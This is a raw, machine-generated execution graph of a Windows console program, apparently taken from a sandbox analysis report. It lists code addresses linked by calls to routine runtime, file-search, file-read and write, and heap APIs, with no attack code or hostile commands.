                                                                                  execution_graph 34447 46bfd7 34448 46c000 34447->34448 34450 46bfde 34447->34450 34450->34448 34451 46c003 34450->34451 34452 46c030 34451->34452 34455 46c073 34451->34455 34458 46c046 34452->34458 34459 46e56a 10 API calls 34452->34459 34454 46c0e2 RtlAllocateHeap 34456 46c065 34454->34456 34455->34458 34460 46e56a 10 API calls 34455->34460 34456->34450 34458->34454 34458->34456 34459->34458 34460->34458 34461 40d875 34462 40d882 34461->34462 34463 40d88d 34461->34463 34462->34463 34465 40d89a __EH_prolog 34462->34465 34468 4585e0 34465->34468 34469 4585e4 VirtualFree 34468->34469 34470 40d906 34468->34470 34469->34470 34470->34463 34471 4585b0 34474 46c0ff 34471->34474 34475 46c12d 34474->34475 34476 4585b6 34474->34476 34477 46c137 34475->34477 34478 46c172 34475->34478 34483 46e56a 10 API calls 34477->34483 34480 46c13e 34478->34480 34484 46e56a 10 API calls 34478->34484 34480->34476 34481 46c1cb RtlFreeHeap 34480->34481 34481->34476 34483->34480 34484->34480 34485 46cf4c GetVersion 34510 46ea66 HeapCreate 34485->34510 34487 46cfaa 34488 46cfb7 34487->34488 34489 46cfaf 34487->34489 34515 46e31c 34488->34515 34579 46d061 8 API calls 34489->34579 34492 46cfbc 34494 46cfc0 34492->34494 34495 46cfc8 34492->34495 34580 46d061 8 API calls 34494->34580 34523 46fcd7 34495->34523 34499 46cfd1 GetCommandLineA 34534 470ad6 34499->34534 34503 46cfeb 34560 4707d0 34503->34560 34505 46cff0 34570 405c72 __EH_prolog 34505->34570 34507 46d011 34581 470658 13 API calls 34507->34581 34509 46d02e 34511 46eabc 34510->34511 34513 46ea86 34510->34513 34511->34487 34512 46eabf 34512->34487 34513->34512 34514 46eab0 HeapDestroy 34513->34514 34514->34511 34582 46e541 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 34515->34582 34517 46e322 TlsAlloc 34518 46e332 34517->34518 34519 46e36c 34517->34519 34518->34519 34520 46e343 TlsSetValue 34518->34520 34519->34492 34520->34519 34521 46e354 34520->34521 34522 46e35a GetCurrentThreadId 34521->34522 34522->34492 34524 46fcea 34523->34524 34525 46fcf8 GetStartupInfoA 34524->34525 34583 46d03c 7 API calls 34524->34583 34531 46fe17 34525->34531 34533 46fd46 34525->34533 34528 46fe42 GetStdHandle 34530 46fe50 GetFileType 34528->34530 34528->34531 34529 46fe82 SetHandleCount 34529->34499 34530->34531 34531->34528 34531->34529 34532 46fddf GetFileType 34532->34533 34533->34531 34533->34532 34535 470b24 34534->34535 34536 470af1 GetEnvironmentStringsW 34534->34536 34538 470af9 34535->34538 34539 470b15 34535->34539 34537 470b05 GetEnvironmentStrings 34536->34537 34536->34538 34537->34539 34540 46cfe1 34537->34540 34541 470b31 GetEnvironmentStringsW 34538->34541 34544 470b3d WideCharToMultiByte 34538->34544 34539->34540 34542 470bb7 GetEnvironmentStrings 34539->34542 34551 470bc3 34539->34551 34553 470889 34540->34553 34541->34540 34541->34544 34542->34540 34542->34551 34545 470ba3 FreeEnvironmentStringsW 34544->34545 34546 470b71 34544->34546 34545->34540 34546->34545 34547 470b80 WideCharToMultiByte 34546->34547 34548 470b91 34547->34548 34549 470b9a 34547->34549 34552 46c0ff 10 API calls 34548->34552 34549->34545 34550 470bf4 FreeEnvironmentStringsA 34550->34540 34551->34550 34552->34549 34554 4708a0 GetModuleFileNameA 34553->34554 34555 47089b 34553->34555 34557 4708c3 34554->34557 34584 471c08 29 API calls 34555->34584 34558 4708f4 34557->34558 34585 46d03c 7 API calls 34557->34585 34558->34503 34561 4707dd 34560->34561 34563 4707e2 34560->34563 34586 471c08 29 API calls 34561->34586 34568 470823 34563->34568 34587 46d03c 7 API calls 34563->34587 34565 470866 34566 46c0ff 10 API calls 34565->34566 34567 470872 34566->34567 34567->34505 34568->34565 34588 46d03c 7 API calls 34568->34588 34589 405f22 GetVersionExA 34570->34589 34574 405ca1 34593 403a70 __EH_prolog SetFileApisToOEM 34574->34593 34576 405cae 34696 401917 SetConsoleCtrlHandler 34576->34696 34578 405f11 34578->34507 34581->34509 34582->34517 34583->34525 34584->34554 34585->34558 34586->34563 34587->34568 34588->34568 34590 405c94 34589->34590 34591 4018a2 SetConsoleCtrlHandler 34590->34591 34592 4018c0 34591->34592 34592->34574 34698 405b9f 34593->34698 34595 403a91 GetCommandLineW 34596 403aad 34595->34596 34597 403acf 34596->34597 34699 404c12 __EH_prolog 34596->34699 34599 40862d ctype __EH_prolog 34597->34599 34601 403f72 34599->34601 34600 403b00 34703 40fec3 34600->34703 34603 408604 ctype __EH_prolog 34601->34603 34605 403f7e 34603->34605 34604 403b0c 34606 403b62 34604->34606 34610 403b2c 34604->34610 34605->34576 34607 403b6b 34606->34607 34611 403b77 34606->34611 34796 458600 GetModuleHandleA GetProcAddress 34607->34796 34609 403b70 34609->34611 34795 405233 __EH_prolog __EH_prolog __EH_prolog ctype 34610->34795 34706 41035d __EH_prolog 34611->34706 34614 403bb1 34747 41741c __EH_prolog 34614->34747 34616 403bf3 34619 403ecc 34616->34619 34670 403c9b 34616->34670 34617 403ffc 34618 404017 34617->34618 34648 404572 34617->34648 34620 404024 34618->34620 34634 4049d4 34618->34634 34619->34617 34621 403f85 34619->34621 34802 401679 33 API calls 34619->34802 34626 404500 34620->34626 34649 404037 34620->34649 34804 4012bb 50 API calls 34621->34804 34624 403f0b 34624->34621 34624->34626 34630 403f18 34624->34630 34625 403f9b 34625->34617 34625->34626 34629 403fa8 34625->34629 34627 404abf 34626->34627 34628 408604 ctype __EH_prolog 34626->34628 34627->34576 34633 404513 34628->34633 34631 408604 ctype __EH_prolog 34629->34631 34632 408604 ctype __EH_prolog 34630->34632 34641 403fc0 34631->34641 34639 403f30 34632->34639 34815 405233 __EH_prolog __EH_prolog __EH_prolog ctype 34633->34815 34634->34626 34636 408604 ctype __EH_prolog 34634->34636 34646 404a64 34636->34646 34638 40453f 34640 40862d ctype __EH_prolog 34638->34640 34803 405233 __EH_prolog __EH_prolog __EH_prolog ctype 34639->34803 34643 404555 34640->34643 34805 405233 __EH_prolog __EH_prolog __EH_prolog ctype 34641->34805 34645 408604 ctype __EH_prolog 34643->34645 34645->34605 34819 405233 __EH_prolog __EH_prolog __EH_prolog ctype 34646->34819 34647 403e8b 34801 405233 __EH_prolog __EH_prolog __EH_prolog ctype 34647->34801 34753 40862d 34648->34753 34806 405172 __EH_prolog ctype 34649->34806 34652 40862d ctype __EH_prolog 34655 404aa3 34652->34655 34656 408604 ctype __EH_prolog 34655->34656 34656->34626 34658 404113 34807 404baf __EH_prolog 34658->34807 34661 4046a4 34760 415d31 __EH_prolog 34661->34760 34662 40411e 34808 419b56 __EH_prolog __EH_prolog __EH_prolog 34662->34808 34664 404139 34666 40413d 34664->34666 34809 419fde 187 API calls ctype 34666->34809 34668 40417c 34674 404221 34668->34674 34810 404b09 8 API calls 34668->34810 34669 404372 34813 4050d8 5 API calls ctype 34669->34813 34797 408604 34670->34797 34671 404313 34671->34669 34812 404b09 8 API calls 34671->34812 34672 4046fa 34676 4048d7 34672->34676 34695 40477f 34672->34695 34674->34671 34811 404b09 8 API calls 34674->34811 34675 404498 34679 408604 ctype __EH_prolog 34675->34679 34817 405489 __EH_prolog __EH_prolog ctype 34676->34817 34680 4044b0 34679->34680 34814 405233 __EH_prolog __EH_prolog __EH_prolog ctype 34680->34814 34682 40496f 34683 408604 ctype __EH_prolog 34682->34683 34689 404995 34683->34689 34685 4044d9 34687 40862d ctype __EH_prolog 34685->34687 34688 4044ef 34687->34688 34690 408604 ctype __EH_prolog 34688->34690 34818 405233 __EH_prolog __EH_prolog __EH_prolog ctype 34689->34818 34692 4044fb 34690->34692 34692->34605 34693 403fe9 34693->34652 34816 405489 __EH_prolog __EH_prolog ctype 34695->34816 34697 401932 34696->34697 34697->34578 34698->34595 34700 404c37 34699->34700 34820 404d09 __EH_prolog 34700->34820 34702 404cc8 34702->34600 34826 406d26 __EH_prolog 34703->34826 34705 40fecd 34705->34604 34707 41037a 34706->34707 34828 410a4c __EH_prolog 34707->34828 34710 41040e 34712 41191e __EH_prolog 34710->34712 34711 41038f 34830 41191e __EH_prolog 34711->34830 34713 410422 34712->34713 34715 410459 34713->34715 34874 410ca4 22 API calls 34713->34874 34718 410485 34715->34718 34875 410ca4 22 API calls 34715->34875 34832 410b06 __EH_prolog 34718->34832 34719 41051c 34720 41075b 34719->34720 34726 410591 34719->34726 34730 410756 34720->34730 34880 41124b 9 API calls ctype 34720->34880 34722 41077c 34881 4117bd __EH_prolog __EH_prolog __EH_prolog 34722->34881 34724 40925b 9 API calls 34725 410a28 34724->34725 34725->34614 34729 4105ed 34726->34729 34876 410ca4 22 API calls 34726->34876 34728 410618 34731 41062d 34728->34731 34878 410ac9 12 API calls 34728->34878 34729->34728 34877 410ca4 22 API calls 34729->34877 34730->34724 34839 411046 34731->34839 34738 410786 34741 411046 15 API calls 34738->34741 34740 410643 34746 4106a7 34740->34746 34879 4117bd __EH_prolog __EH_prolog __EH_prolog 34740->34879 34741->34730 34742 40862d ctype __EH_prolog 34744 41074a 34742->34744 34745 408604 ctype __EH_prolog 34744->34745 34745->34730 34746->34742 34748 40862d ctype __EH_prolog 34747->34748 34750 417435 34748->34750 34752 4174d6 34750->34752 34988 41721b __EH_prolog 34750->34988 34998 405aaf __EH_prolog __EH_prolog ctype 34750->34998 34752->34616 34999 408642 34753->34999 34756 405bba 34759 405bd2 34756->34759 34757 405bea 34757->34661 34759->34757 35008 405bf3 __EH_prolog 34759->35008 34762 415d82 34760->34762 34761 40b431 9 API calls 34761->34762 34762->34761 34764 415e28 34762->34764 34763 4163df 34766 408604 ctype __EH_prolog 34763->34766 34765 415eec 34764->34765 34779 415f10 34764->34779 34768 408604 ctype __EH_prolog 34765->34768 34767 415f08 34766->34767 34767->34672 34768->34767 34769 40b431 9 API calls 34769->34779 34770 41668a 34771 408604 ctype __EH_prolog 34771->34767 34772 40862d ctype __EH_prolog 34772->34779 34774 416489 34775 408604 ctype __EH_prolog 34774->34775 34783 41646b 34775->34783 34776 4164c4 34777 408604 ctype __EH_prolog 34776->34777 34777->34783 34778 408604 ctype __EH_prolog 34778->34779 34779->34763 34779->34769 34779->34770 34779->34772 34779->34774 34779->34776 34779->34778 34780 4164fd 34779->34780 34782 416536 34779->34782 34779->34783 34786 416578 34779->34786 34787 4165ba 34779->34787 34789 4165f9 34779->34789 34791 416638 34779->34791 35009 418a23 __EH_prolog 34779->35009 35021 46c55c 34779->35021 35028 416922 __EH_prolog 34779->35028 34781 408604 ctype __EH_prolog 34780->34781 34781->34783 34784 408604 ctype __EH_prolog 34782->34784 34783->34771 34784->34783 34788 408604 ctype __EH_prolog 34786->34788 34790 408604 ctype __EH_prolog 34787->34790 34788->34783 34792 408604 ctype __EH_prolog 34789->34792 34790->34783 34793 408604 ctype __EH_prolog 34791->34793 34792->34783 34793->34783 34795->34597 34796->34609 34798 40860f 34797->34798 34799 40862d ctype __EH_prolog 34798->34799 34800 408617 34799->34800 34800->34647 34801->34597 34802->34624 34803->34597 34804->34625 34805->34693 34806->34658 34807->34662 34808->34664 34809->34668 34810->34668 34811->34671 34812->34671 34813->34675 34814->34685 34815->34638 34816->34626 34817->34682 34818->34693 34819->34693 34821 404d2a 34820->34821 34824 404e10 __EH_prolog 34821->34824 34823 404d5c 34823->34702 34825 404e36 34824->34825 34825->34823 34827 406d68 34826->34827 34827->34705 34829 410a66 34828->34829 34829->34711 34831 411937 34830->34831 34831->34710 34833 410b28 34832->34833 34838 410b4f 34832->34838 34833->34838 34882 410ac9 12 API calls 34833->34882 34834 410bb5 34834->34719 34838->34834 34883 410bdc 13 API calls ctype 34838->34883 34884 410ac9 12 API calls 34838->34884 34840 411051 34839->34840 34841 410635 34839->34841 34840->34841 34885 411068 __EH_prolog 34840->34885 34843 40925b 34841->34843 34844 40926b 34843->34844 34845 4092a4 34844->34845 34928 408ec6 9 API calls 34844->34928 34845->34740 34847 41003e __EH_prolog 34845->34847 34848 41005e 34847->34848 34929 415349 __EH_prolog 34848->34929 34850 4100b4 34851 410278 34850->34851 34852 408604 ctype __EH_prolog 34850->34852 34851->34740 34853 4100d1 34852->34853 34854 40862d ctype __EH_prolog 34853->34854 34855 4100e0 34854->34855 34856 408604 ctype __EH_prolog 34855->34856 34860 4100ec 34856->34860 34857 410133 34936 4102df __EH_prolog __EH_prolog ctype 34857->34936 34860->34857 34935 41528b __EH_prolog 34860->34935 34862 410142 34937 4195a6 __EH_prolog ctype 34862->34937 34863 4101da 34864 408604 ctype __EH_prolog 34863->34864 34865 41022e 34864->34865 34866 40862d ctype __EH_prolog 34865->34866 34867 41023d 34866->34867 34868 408604 ctype __EH_prolog 34867->34868 34869 410249 34868->34869 34870 40862d ctype __EH_prolog 34869->34870 34871 41025b 34870->34871 34872 408604 ctype __EH_prolog 34871->34872 34873 410267 34872->34873 34873->34740 34874->34715 34875->34718 34876->34729 34877->34728 34878->34731 34879->34746 34880->34722 34881->34738 34882->34838 34883->34838 34884->34838 34897 411215 34885->34897 34888 411215 10 API calls 34890 411091 34888->34890 34896 4110ae 34890->34896 34901 411194 __EH_prolog 34890->34901 34891 411185 34891->34840 34893 411068 14 API calls 34895 411130 34893->34895 34894 409391 __EH_prolog __EH_prolog __EH_prolog 34894->34896 34895->34891 34895->34893 34905 411bd0 __EH_prolog 34895->34905 34896->34894 34896->34895 34898 411223 34897->34898 34899 411087 34897->34899 34898->34899 34900 411194 10 API calls 34898->34900 34899->34888 34900->34898 34902 4111ad 34901->34902 34904 4111dd 34901->34904 34902->34904 34906 40b431 __EH_prolog 34902->34906 34904->34890 34905->34895 34907 40b44d 34906->34907 34911 40b451 34907->34911 34912 40b174 __EH_prolog 34907->34912 34909 40b4b3 34924 40b154 34909->34924 34911->34904 34913 40b154 FindClose 34912->34913 34914 40b18c 34913->34914 34915 40b20f 34914->34915 34916 40b19f FindFirstFileW 34914->34916 34921 40b1ec 34914->34921 34918 40b21a AreFileApisANSI 34915->34918 34917 40b1b9 34916->34917 34916->34921 34917->34921 34922 40b1de FindFirstFileW 34917->34922 34927 40822f __EH_prolog WideCharToMultiByte 34918->34927 34920 40b238 FindFirstFileA 34923 40b252 34920->34923 34921->34909 34922->34921 34923->34921 34925 40b15e FindClose 34924->34925 34926 40b169 34924->34926 34925->34926 34926->34911 34927->34920 34928->34844 34930 415401 34929->34930 34931 41536d 34929->34931 34930->34850 34931->34930 34933 40862d ctype __EH_prolog 34931->34933 34934 408604 ctype __EH_prolog 34931->34934 34938 415420 __EH_prolog 34931->34938 34933->34931 34934->34931 34935->34860 34936->34862 34937->34863 34941 415441 34938->34941 34939 4158a9 34985 411bd0 __EH_prolog 34939->34985 34941->34939 34944 41547d 34941->34944 34976 4154d7 34941->34976 34942 415870 34943 408604 ctype __EH_prolog 34942->34943 34943->34944 34944->34931 34945 40b431 9 API calls 34945->34976 34946 415b38 GetLastError 34950 415b47 34946->34950 34947 415542 GetLastError 34947->34976 34948 40b431 9 API calls 34954 415723 34948->34954 34949 4092a8 __EH_prolog __EH_prolog 34970 4158b6 34949->34970 34951 40b154 FindClose 34950->34951 34951->34944 34952 41578c GetLastError 34952->34954 34954->34942 34954->34948 34954->34952 34957 40862d ctype __EH_prolog 34954->34957 34960 408604 ctype __EH_prolog 34954->34960 34964 4157b3 34954->34964 34984 415bca 20 API calls 34954->34984 34956 408e8a __EH_prolog 34956->34970 34957->34954 34958 415b77 34961 40b154 FindClose 34958->34961 34959 40862d __EH_prolog ctype 34959->34976 34960->34954 34961->34944 34962 408604 __EH_prolog ctype 34962->34976 34966 408604 ctype __EH_prolog 34964->34966 34966->34944 34967 408604 __EH_prolog ctype 34967->34970 34968 40862d __EH_prolog ctype 34968->34970 34970->34946 34970->34949 34970->34950 34970->34956 34970->34958 34970->34967 34970->34968 34975 415b7b 34970->34975 34986 4150e0 __EH_prolog __EH_prolog 34970->34986 34987 415bca 20 API calls 34970->34987 34972 415795 34973 40862d ctype __EH_prolog 34972->34973 34974 4157a4 34973->34974 34978 408604 ctype __EH_prolog 34974->34978 34977 40862d ctype __EH_prolog 34975->34977 34976->34945 34976->34947 34976->34954 34976->34959 34976->34962 34976->34972 34981 408e8a __EH_prolog 34976->34981 34982 4150e0 __EH_prolog __EH_prolog 34976->34982 34983 415bca 20 API calls 34976->34983 34979 415b87 34977->34979 34978->34964 34980 408604 ctype __EH_prolog 34979->34980 34980->34958 34981->34976 34982->34976 34983->34976 34984->34954 34985->34970 34986->34970 34987->34970 34997 417235 34988->34997 34989 40862d ctype __EH_prolog 34990 41733c 34989->34990 34991 408604 ctype __EH_prolog 34990->34991 34992 417348 34991->34992 34993 40862d ctype __EH_prolog 34992->34993 34994 41735a 34993->34994 34995 408604 ctype __EH_prolog 34994->34995 34996 417366 34995->34996 34996->34750 34997->34989 34998->34750 35002 42751a 34999->35002 35000 404692 35000->34756 35005 427531 35002->35005 35003 427569 35003->35000 35005->35003 35006 423db2 __EH_prolog 35005->35006 35007 423dd7 ctype 35006->35007 35007->35005 35008->34759 35010 418a4a 35009->35010 35013 418a5c 35010->35013 35091 418c9d __EH_prolog 35010->35091 35012 418b88 35079 418554 __EH_prolog 35012->35079 35013->35012 35057 40a28c __EH_prolog 35013->35057 35016 418ae8 35017 418aec GetLastError 35016->35017 35019 418b27 35016->35019 35018 418afc 35017->35018 35018->34779 35073 418e2d __EH_prolog 35019->35073 35280 46c2a4 35021->35280 35023 46c568 35024 46c56e 35023->35024 35286 4704bb 35023->35286 35296 46c2f6 35024->35296 35027 46c591 35027->34779 35038 41694e 35028->35038 35029 416971 35031 408604 ctype __EH_prolog 35029->35031 35030 4169f5 35030->35029 35036 416a25 35030->35036 35032 416a0e 35031->35032 35032->34779 35033 416a15 35035 408604 ctype __EH_prolog 35033->35035 35035->35032 35037 416b09 35036->35037 35358 409d7c __EH_prolog 35036->35358 35367 411c21 35037->35367 35038->35029 35038->35030 35038->35033 35038->35036 35469 408e6d __EH_prolog __EH_prolog __EH_prolog __EH_prolog __EH_prolog 35038->35469 35041 416a9d 35041->35037 35043 416aa1 GetLastError 35041->35043 35042 416b3b 35371 4192f5 __EH_prolog 35042->35371 35051 416aad 35043->35051 35046 416bd4 35391 4297ca 35046->35391 35428 4290c5 __EH_prolog 35046->35428 35047 40862d ctype __EH_prolog 35049 416c07 35047->35049 35048 416bd2 35048->35051 35054 46c55c 26 API calls 35048->35054 35050 408604 ctype __EH_prolog 35049->35050 35050->35033 35051->35047 35052 416b83 35053 40c20f VariantClear 35052->35053 35053->35048 35054->35051 35058 40a2b8 35057->35058 35059 40a39b 35057->35059 35060 40a2cd GetFullPathNameW 35058->35060 35093 409ad5 __EH_prolog WideCharToMultiByte __EH_prolog AreFileApisANSI 35059->35093 35065 40a2f3 35060->35065 35062 40a3bc 35094 40a20f GetFullPathNameA lstrlenA 35062->35094 35063 40a328 GetFullPathNameW 35066 40a343 35063->35066 35065->35063 35065->35066 35072 40a396 35065->35072 35066->35072 35092 40a4a1 __EH_prolog 35066->35092 35068 40a3d0 35068->35072 35095 4098a8 __EH_prolog MultiByteToWideChar AreFileApisANSI 35068->35095 35070 40a415 35096 4098a8 __EH_prolog MultiByteToWideChar AreFileApisANSI 35070->35096 35072->35016 35074 418e4c 35073->35074 35075 40b431 9 API calls 35074->35075 35076 418e68 35075->35076 35077 40862d ctype __EH_prolog 35076->35077 35078 418e9e 35077->35078 35078->35012 35089 41856f 35079->35089 35080 4189b9 __EH_prolog 35080->35089 35081 418814 35082 40c20f VariantClear 35081->35082 35090 41857a 35082->35090 35083 41898e 35085 40c20f VariantClear 35083->35085 35085->35090 35086 418f34 __EH_prolog __EH_prolog 35086->35089 35089->35080 35089->35081 35089->35083 35089->35086 35089->35090 35097 4183fd __EH_prolog 35089->35097 35103 40c20f 35089->35103 35107 417bae __EH_prolog 35089->35107 35090->35018 35091->35013 35092->35072 35093->35062 35094->35068 35095->35070 35096->35072 35100 418446 35097->35100 35102 418422 35097->35102 35098 417bae 143 API calls 35099 4184aa 35098->35099 35099->35089 35101 418486 GetLastError 35100->35101 35100->35102 35101->35099 35102->35098 35104 40c214 35103->35104 35105 40c24c 35104->35105 35106 40c235 VariantClear 35104->35106 35105->35089 35106->35089 35109 417bce 35107->35109 35108 418275 35112 408604 ctype __EH_prolog 35108->35112 35109->35108 35110 408642 ctype __EH_prolog 35109->35110 35113 417cf0 35109->35113 35131 417c70 35109->35131 35110->35113 35111 417e00 35114 408604 ctype __EH_prolog 35111->35114 35115 417e0c 35112->35115 35116 417fba 35113->35116 35118 417d14 35113->35118 35114->35115 35115->35089 35120 40fa74 5 API calls 35116->35120 35126 417d95 35116->35126 35116->35131 35117 408604 ctype __EH_prolog 35123 4183e4 35117->35123 35122 417d58 35118->35122 35171 40fa74 35118->35171 35120->35131 35124 408604 ctype __EH_prolog 35122->35124 35123->35089 35124->35126 35125 417d9a 35130 417dd9 35125->35130 35132 417e32 35125->35132 35126->35117 35127 4182ae 35127->35126 35128 40c20f VariantClear 35127->35128 35129 418311 35128->35129 35135 41832c 35129->35135 35136 418388 35129->35136 35134 408604 ctype __EH_prolog 35130->35134 35131->35108 35131->35111 35131->35126 35131->35127 35145 40d340 35131->35145 35151 43394a __EH_prolog 35131->35151 35155 42d57a 35131->35155 35161 42b338 __EH_prolog 35131->35161 35133 40862d ctype __EH_prolog 35132->35133 35139 417f7a 35133->35139 35134->35111 35175 414f74 __EH_prolog __EH_prolog 35135->35175 35176 414f74 __EH_prolog __EH_prolog 35136->35176 35140 408604 ctype __EH_prolog 35139->35140 35140->35131 35146 40d34c 35145->35146 35149 40d355 35145->35149 35146->35149 35177 40ba47 35146->35177 35149->35131 35152 43395f 35151->35152 35153 433973 35152->35153 35183 42a3cd __EH_prolog 35152->35183 35153->35131 35156 42d58b 35155->35156 35160 40d340 3 API calls 35156->35160 35157 42d59f 35158 42d5af 35157->35158 35195 42d33c __EH_prolog 35157->35195 35158->35131 35160->35157 35162 42b359 35161->35162 35163 40862d ctype __EH_prolog 35162->35163 35164 42b364 35163->35164 35165 42d57a 6 API calls 35164->35165 35166 42b3b9 35165->35166 35169 42b3c0 35166->35169 35201 42f024 __EH_prolog 35166->35201 35168 42b427 35168->35169 35204 430b45 __EH_prolog __EH_prolog __EH_prolog ctype 35168->35204 35169->35131 35172 40fa88 35171->35172 35173 40fab7 35172->35173 35258 40d071 35172->35258 35173->35122 35173->35125 35175->35126 35176->35126 35178 40ba53 35177->35178 35179 40ba6f SetFilePointer 35177->35179 35178->35179 35180 40ba9d 35179->35180 35181 40ba93 GetLastError 35179->35181 35182 40d2c2 GetLastError 35180->35182 35181->35180 35182->35149 35188 421886 __EH_prolog 35183->35188 35185 42a3ea 35191 425658 35185->35191 35189 425658 GetSystemInfo 35188->35189 35190 4218b8 35189->35190 35190->35185 35194 40c5f4 GetSystemInfo 35191->35194 35193 42567a 35193->35153 35194->35193 35198 40fac0 35195->35198 35197 42d35f 35197->35158 35199 40fa74 5 API calls 35198->35199 35200 40fad3 35199->35200 35200->35197 35205 42ec5c __EH_prolog 35201->35205 35203 42f047 35203->35168 35204->35169 35208 42ec7b 35205->35208 35206 42ed7c 35214 42ee03 35206->35214 35220 40d340 3 API calls 35206->35220 35207 42ee68 35209 40fac0 5 API calls 35207->35209 35207->35214 35208->35206 35210 40fac0 5 API calls 35208->35210 35208->35214 35211 42ee9a 35209->35211 35210->35206 35211->35214 35219 42ef63 35211->35219 35221 42e01c __EH_prolog 35211->35221 35214->35203 35215 42ef67 35216 40862d ctype __EH_prolog 35215->35216 35217 42efe9 35216->35217 35218 408604 ctype __EH_prolog 35217->35218 35218->35214 35219->35215 35257 42e3b2 130 API calls ctype 35219->35257 35220->35207 35222 42e03b 35221->35222 35223 42de7c __EH_prolog __EH_prolog __EH_prolog __EH_prolog __EH_prolog 35222->35223 35234 42e113 35223->35234 35224 42e2a3 35225 429925 __EH_prolog __EH_prolog 35224->35225 35226 42e2b2 35225->35226 35227 408604 ctype __EH_prolog 35226->35227 35228 42e2be 35227->35228 35229 408604 ctype __EH_prolog 35228->35229 35230 42e2cd 35229->35230 35231 408604 ctype __EH_prolog 35230->35231 35232 42e2dc 35231->35232 35233 408604 ctype __EH_prolog 35232->35233 35256 42e2eb 35233->35256 35234->35224 35239 4264f7 122 API calls 35234->35239 35242 42e349 35234->35242 35235 40862d ctype __EH_prolog 35236 42e300 35235->35236 35237 408604 ctype __EH_prolog 35236->35237 35238 42e30c 35237->35238 35240 408604 ctype __EH_prolog 35238->35240 35239->35234 35241 42e31b 35240->35241 35243 408604 ctype __EH_prolog 35241->35243 35245 429925 __EH_prolog __EH_prolog 35242->35245 35244 42e32a 35243->35244 35246 408604 ctype __EH_prolog 35244->35246 35247 42e366 35245->35247 35248 42e336 35246->35248 35249 408604 ctype __EH_prolog 35247->35249 35248->35219 35250 42e372 35249->35250 35251 408604 ctype __EH_prolog 35250->35251 35252 42e381 35251->35252 35253 408604 ctype __EH_prolog 35252->35253 35254 42e390 35253->35254 35255 408604 ctype __EH_prolog 35254->35255 35255->35256 35256->35235 35257->35215 35259 40d07e 35258->35259 35261 40d284 35259->35261 35263 40d1f6 35259->35263 35264 40ba47 2 API calls 35259->35264 35266 40d0b3 35259->35266 35267 40d21c 35259->35267 35274 4585c0 35259->35274 35277 40bc58 ReadFile 35259->35277 35278 40d2c2 GetLastError 35261->35278 35265 40ba47 2 API calls 35263->35265 35263->35267 35264->35259 35265->35267 35266->35172 35267->35261 35270 40bc85 35267->35270 35271 40bc92 35270->35271 35279 40bc58 ReadFile 35271->35279 35273 40bca3 35273->35261 35275 4585c4 35274->35275 35276 4585c7 VirtualAlloc 35274->35276 35275->35259 35276->35259 35277->35259 35278->35266 35279->35273 35281 46c2b1 35280->35281 35282 46c2c8 EnterCriticalSection 35280->35282 35281->35282 35283 46c2b8 35281->35283 35282->35023 35300 46e56a 10 API calls 35283->35300 35285 46c2c6 35285->35023 35287 470555 35286->35287 35288 4704d1 35286->35288 35287->35024 35288->35287 35289 470536 35288->35289 35290 47059d 35288->35290 35291 47054d 35289->35291 35294 47055d 35289->35294 35292 4702cb 24 API calls 35290->35292 35301 4702cb 35291->35301 35292->35287 35294->35287 35315 47165c 20 API calls 35294->35315 35297 46c303 35296->35297 35298 46c31a LeaveCriticalSection 35296->35298 35297->35298 35299 46c30a 35297->35299 35298->35027 35299->35027 35300->35285 35302 470318 35301->35302 35303 4702d8 35301->35303 35349 470646 12 API calls 35302->35349 35303->35302 35304 4702f3 35303->35304 35316 471359 35304->35316 35307 47031d 35350 47064f 12 API calls 35307->35350 35308 4702fa 35323 470330 35308->35323 35311 470328 35311->35287 35314 470310 35314->35287 35315->35287 35317 4713a7 EnterCriticalSection 35316->35317 35318 471384 35316->35318 35317->35308 35351 46e56a 10 API calls 35318->35351 35320 47138b 35321 471392 InitializeCriticalSection 35320->35321 35322 47139f 35320->35322 35321->35322 35322->35317 35324 470350 35323->35324 35345 470308 35323->35345 35325 470372 35324->35325 35326 470380 35324->35326 35352 4716c1 14 API calls 35325->35352 35328 47044f WriteFile 35326->35328 35335 47038e 35326->35335 35329 470466 35328->35329 35330 470471 GetLastError 35328->35330 35333 470416 35329->35333 35330->35333 35331 47037d 35331->35326 35332 47048a 35332->35345 35356 470646 12 API calls 35332->35356 35333->35332 35338 470428 35333->35338 35333->35345 35335->35332 35335->35333 35336 4703da WriteFile 35335->35336 35336->35335 35337 470444 GetLastError 35336->35337 35337->35333 35340 470430 35338->35340 35341 47047c 35338->35341 35339 4704a4 35357 47064f 12 API calls 35339->35357 35353 470646 12 API calls 35340->35353 35355 4705d3 12 API calls 35341->35355 35348 4713b8 LeaveCriticalSection 35345->35348 35346 470435 35354 47064f 12 API calls 35346->35354 35348->35314 35349->35307 35350->35311 35351->35320 35352->35331 35353->35346 35354->35345 35355->35345 35356->35339 35357->35345 35365 409d95 35358->35365 35360 409e0c GetLastError 35361 409e89 35360->35361 35360->35365 35362 40b431 9 API calls 35361->35362 35363 409ea0 35362->35363 35364 409dd7 35363->35364 35366 409ccb 9 API calls 35363->35366 35364->35041 35365->35360 35365->35363 35365->35364 35470 409ccb __EH_prolog 35365->35470 35366->35363 35368 411c7a 35367->35368 35369 40862d ctype __EH_prolog 35368->35369 35370 411cc3 35369->35370 35370->35042 35378 419315 35371->35378 35390 416b45 35371->35390 35372 419455 35374 4194f1 35372->35374 35375 4194ab 35372->35375 35376 408604 ctype __EH_prolog 35374->35376 35377 408604 ctype __EH_prolog 35375->35377 35379 4194f6 35376->35379 35380 4194b0 35377->35380 35378->35372 35388 40c20f VariantClear 35378->35388 35378->35390 35483 40c13b VariantClear 35378->35483 35484 419556 SysAllocString VariantClear 35378->35484 35485 40c068 VariantClear VariantCopy 35378->35485 35384 40862d ctype __EH_prolog 35379->35384 35383 40862d ctype __EH_prolog 35380->35383 35385 4194c3 35383->35385 35386 41951e 35384->35386 35387 408604 ctype __EH_prolog 35385->35387 35389 408604 ctype __EH_prolog 35386->35389 35387->35390 35388->35378 35389->35390 35390->35046 35390->35051 35390->35052 35408 429306 35391->35408 35392 42932b 35394 429925 2 API calls 35392->35394 35393 429360 35486 429925 __EH_prolog 35393->35486 35395 42927f 35394->35395 35398 40862d ctype __EH_prolog 35395->35398 35400 429287 35398->35400 35399 42937b 35595 4299b8 __EH_prolog __EH_prolog ctype 35399->35595 35402 408604 ctype __EH_prolog 35400->35402 35405 429293 35402->35405 35404 429429 35406 429925 2 API calls 35404->35406 35405->35048 35407 42945a 35406->35407 35409 40862d ctype __EH_prolog 35407->35409 35408->35392 35408->35393 35408->35404 35413 42a381 82 API calls 35408->35413 35414 4295ed 35408->35414 35415 429660 35408->35415 